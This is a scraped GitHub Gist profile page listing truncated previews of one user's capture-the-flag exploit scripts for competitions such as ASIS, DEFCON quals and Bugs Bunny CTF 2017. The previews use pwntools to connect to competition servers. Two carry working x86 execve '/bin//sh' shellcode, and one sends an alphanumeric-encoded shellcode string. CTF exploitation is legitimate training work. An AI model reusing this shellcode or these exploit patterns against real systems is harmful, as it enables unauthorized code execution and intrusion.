Skip to content

Instantly share code, notes, and snippets.

View 0xPwny's full-sized avatar

AJ N 0xPwny

  • Segfault the world
  • Morocco
View GitHub Profile
@0xPwny
0xPwny / exploit.py
Last active September 12, 2017 22:14
ASIS CTF FINALS 2017 - mary_morton pwnable
#!/usr/bin/python
from pwn import *
#r = process("./mary_morton")
r = remote('146.185.132.36',19153)
def fmtstr(pld):
r.recvuntil('Exit')
r.sendline("2")
@0xPwny
0xPwny / pwn150.py
Created August 28, 2017 17:28
hackit CTF 2017
from pwn import *
#r = process("./pwn150")
getflag = 0x000104d8
r = remote("165.227.98.55",2223)
def exploit(pld):
@0xPwny
0xPwny / xkcd_exploit.py
Created August 20, 2017 17:35
DEFCON quals 2016 - xkcd
from pwn import *
r = process("./xkcd")
#raw_input("attach$ ")
def key(value,size):
sen = "SERVER, ARE YOU STILL THERE? IF SO, REPLY \"{}\" ({} LETTERS)".format(value,size)
return sen
@0xPwny
0xPwny / pwn200.py
Created July 31, 2017 12:55
Bugs Bunny CTF - PWN200
from pwn import *
#r = process("./pwn200")
r = remote("54.153.19.139",5254)
#raw_input()
SC ="\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
@0xPwny
0xPwny / pwn300.py
Created July 31, 2017 11:26
Bugs Bunny CTF 2017 - PWN300
from pwn import*
io = process("./pwn300")
io = remote("54.153.19.139",5256)
io.sendline("Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M15103e0y4s3c1n0x0H8K2D1K3L7N2l0Y2v7O0g0K2C0e2l5L0w2w14164x0z1m3r0V070v")
io.interactive()
@0xPwny
0xPwny / baby_rsa.py
Created July 31, 2017 11:21
Bugs Bunny CTF 2017 - Baby RSA
#!/usr/bin/python
#Bugs_Bunny CTF 2107
import libnum
r = open("enc.txt","rb")
f = r.read().split('\n')
flag = ""
@0xPwny
0xPwny / pwn150.py
Created July 31, 2017 11:18
Bugs Bunny CTF 2017 - PWN150
#!/usr/bin/python
#Bugs_Bunny CTF 2017
from pwn import *
#r = process("./pwn150")
#raw_input()
r =remote("54.153.19.139",5253)
@0xPwny
0xPwny / pwn100.py
Created July 31, 2017 11:15
Bugs Bunny CTF 2017 - PWN100
#!/usr/bin/python
#Bugs_Bunny CTF 2017
from pwn import *
r = remote("54.153.19.139",5252)
ret = 0x804b028
@0xPwny
0xPwny / ping_exp.py
Last active June 2, 2017 04:01
SecurityFest CTF 2017 Ping - Pwn
#!/usr/bin/python
#Author : Abdeljalil Nouiri
from pwn import *
con =remote('pwn2.ctf.rocks',3030)
con.recvuntil("username:")
con.sendline("HackXore")
@0xPwny
0xPwny / do_twice.py
Last active May 31, 2017 13:39
WhiteHat Contest 13 - Pwnable Ho Coc Beach - Exploit
#!/usr/bin/python
from pwn import *
#Author = <Abdeljalil Nouiri - [email protected]>
#con = process( "./do_twice" )
con = remote("dotwice.wargame.whitehat.vn", 1337)
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
addr = 0x804b0c0